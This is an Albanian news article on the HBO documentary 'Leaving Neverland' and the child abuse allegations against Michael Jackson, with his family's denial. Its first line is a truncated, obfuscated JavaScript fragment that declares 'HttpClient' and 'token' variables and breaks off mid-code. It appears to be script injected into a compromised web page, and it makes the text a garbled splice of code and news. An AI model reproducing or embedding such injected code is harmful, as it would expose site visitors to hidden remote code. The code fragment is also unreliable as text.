;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Michael Jackson portretizohet si abuzues e pedofil në dokumentarin e ri që u publikua këtë fundjavë

By

Ylli tashmë i ndjerë i muzikës pop Michael Jackson, i cilësuar edhe si Mbreti i Popit, është fokusi i dokumentarit të ri me titullin “Leaving Neverland”, i cili u transmetua këtë fundjavë në patformën HBO.

Dokumentari i cili zgjatë katër orë ka për qendër të vëmendjes dy viktima ta abuzimit seksual të Jackson, Wade Robson dhe James Safechuck. Që të dy edhe Robson e edhe Safechuck, tani të dy në të 30-tat e tyre, kanë thënë se Mbreti i Pop-it i kishte abuzuar seksualisht për vjet e vjet kur ata ishin vetëm 7 vjeç dhe 10-të vjeç.

Image result for michael jackson

Ndërsa autori Dan Reed, i ka kaluar plot tri vjet duke e bërë gati këtë dokumentar.

“Për shumë vjet Jackson është paraqitur si një njeri i dashur për fëmijët dhe na e ka dhënë imazhin e të pafajshmit. Ndërsa ne kemi dashur ta bëjmë të qartë e ajo që ka ndodhur, ka qenë aktivitet seksual pa asnjë dyshim”, ka thënë Reed.

https://www.youtube.com/watch?v=dOX-rBzVZ90

Reed po ashtu ka thënë se edhe vet u ishte qasur me shumë skepticizëm dëshmive të Robson dhe Safechuck, mirëpo pasi ka bërë kërkime ekstenzive, ai i ka vërtetuar dëshmitë e tyre edhe me raportimet në polici të cilat datojnë që nga viti 1993 dhe 2003 deri në 2005-së.

Ndërsa këto ditë, pak para transmetimit të filmit dokumentar, pjesëtarët e familjes Jackson, i kanë mohuar të gjitha këto akuza. /Prive.al

Image result for michael jackson

Artikuj të ngjashëm